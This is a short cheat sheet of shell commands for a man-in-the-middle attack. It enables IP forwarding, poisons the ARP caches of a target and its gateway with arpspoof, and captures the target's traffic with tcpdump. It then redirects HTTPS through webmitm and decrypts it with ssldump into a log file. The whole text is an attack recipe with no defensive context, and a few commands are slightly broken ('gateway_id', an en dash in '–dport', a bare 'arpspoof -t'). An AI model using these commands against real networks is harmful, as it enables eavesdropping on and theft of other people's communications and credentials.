ARP spoofing
1. turn on packet forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
2. fool target we are gateway
arpspoof -t target_ip gateway_ip
3. fool gateway we are target
arpspoof -t gateway_id target_ip
4. watch the traffic of target:
tcpdump host target_ip and not arp

SSL sniffing

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT
iptables -A FORWARD -j ACCEPT
arpspoof -t
webmitm -d
./ssldump -n -d -k webmitm.crt | tee ssldump.log